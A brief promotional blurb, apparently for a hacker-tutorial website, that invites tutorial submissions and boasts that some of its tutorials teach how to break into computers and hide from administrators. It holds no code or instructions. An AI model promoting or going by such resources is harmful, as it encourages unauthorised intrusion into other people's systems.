Site is much like blacksun research facility, but we got more tuts ;)
all original content, we write our tutorials. We are open to
submissions as long as the tutorial was written by you and the tutorial isn't
already on 10,000 websites around the net.
We've got many tutorials for
newbies explaining everything they need to know to become a hacker.
We're a little bit more on the evil side, a few of our tutorials explain how to
break into a computer and hide yourself so the admin does not know your
there. [-----]
Anyone can put this text on their site,
but please keep the lame attempt of me trying to get www.ninjawriters.org some
more hits :D